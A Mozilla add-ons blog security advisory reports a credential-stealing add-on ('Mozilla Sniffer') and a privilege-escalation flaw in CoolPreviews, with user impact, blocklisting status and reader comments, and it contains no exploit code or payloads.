Add-on security vulnerability announcement

Jorge Villalobos

11

One malicious add-on and another add-on with a serious security vulnerability were discovered recently on the Mozilla Add-ons site. Both issues have been dealt with, and the details are described below.

Mozilla Sniffer

Issue

An add-on called “Mozilla Sniffer” was uploaded on June 6th to addons.mozilla.org. It was discovered that this add-on contains code that intercepts login data submitted to any website, and sends this data to a remote location. Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users.

Impact to users

If a user installs this add-on and submits a login form with a password field, all form data will be submitted to a remote location. Uninstalling the add-on stops this behavior. Anybody who has installed this add-on should change their passwords as soon as possible.

Status

Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. All current users should receive an uninstall notification within a day or so. The site this add-on sends data to seems to be down at the moment, so it is unknown if data is still being collected.

Mozilla Sniffer was not developed by Mozilla, and it was not reviewed by Mozilla. The add-on was in an experimental state, and all users that installed it should have seen a warning indicating it is unreviewed. Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review.

Credit

This issue was originally reported by Johann-Peter Hartmann.

Note

Having unreviewed add-ons exposed to the public, even with low visibility, has been previously identified as an attack vector for hackers. For this reason, we’re already working on implementing a new security model for addons.mozilla.org that will require all add-ons to be code-reviewed before they are discoverable in the site. Here’s more information about it.

CoolPreviews

Issue

A security escalation vulnerability was discovered in version 3.0.1 of the CoolPreviews add-on. The vulnerability can be triggered using a specially crafted hyperlink. If the user hovers the cursor over this link, the preview function executes remote JavaScript code with local chrome privileges, giving the attacking script control over the host computer. Version 3.0.1 and all older versions have been disabled on addons.mozilla.org, and a fixed version was uploaded and reviewed within a day of the developer being notified.

Impact to users

Proof of concept code for this vulnerability was posted on this blog, but no known malicious exploits have been reported so far. If a user has a vulnerable version installed and clicks on a malicious link that targets the add-on, the code in the malicious link will run with local privileges, potentially gaining access to the file system and allowing code download and execution.

All users of CoolPreviews should update to the latest version as soon as possible in order to avoid exposure.

Status

Currently, 177,000 users have a vulnerable version installed. This is less than 25% of the current install base and it will continue to decrease as more users are prompted to update to a new version. Vulnerable versions will also be blocklisted very soon.

Credit

This issue was originally reported by Alice White.

11 responses

  1. Andreas Grech wrote on ::

    Very interesting.

    I have written about this same concept just a couple of days ago as well: http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html

    In my post, I talk about how an attacker can intercept login details with a Google Chrome extension.

  2. dynamis wrote on :

    Mozilla Sniffer should be listed in this page isn’ it?
    https://www.mozilla.com/en-US/blocklist/

  3. Anonymous wrote on :

    We prefer our privacy. The people who installed the add-on, did this on their own risk.

  4. Harry Johnston wrote on ::

    What was the advertised purpose of the Mozilla Sniffer add-on?

  5. Jorge wrote on ::

    @dynamis: yes, I think it will be added eventually.
    @Harry Johnston: it was advertised as a modified version of the TamperData add-on. And it was.

  6. John wrote on :

    Mozilla Sniffer and CoolPreview still not listed on the block list that we see. I hope this isn’t the list they use for blocking!

    Also, I have no problem with Mozilla knowing how many downloads there have been but find it curious to know that they can tell us how often addons are being used. Not sure that I like that. What else are they collecting with that?

  7. PFudd wrote on :

    I’m hoping that this will encourage the signing of reviewed code, such that the apps available through addons.mozilla.org will finally stop saying “Author not verified” for every single addon. Although, really, it should say ‘Code verified/not verified’ in addition to ‘Author verified/not verified’.

    1. wrote on :

      It says right there, below the install button, on the page that the add-on hasn’t been reviewed…

  8. lonic wrote on :

    If people like it or it sounds interesting they will install it anyway.
    Just when it’s experimental, or the security warning popups or even “don’t click” buttons, ‘interesting picture of you’, etc…

  9. Rod wrote on :

    How does one see whether the add-on has been installed on their computer? Thanks.

  10. Jorge wrote on ::

    @Rod: the add-on should’ve been disabled by now because it’s blocklisted. You can check if it’s installed by opening the Add-ons Manager. It’s accessible from the main menu, at Tools > Add-ons.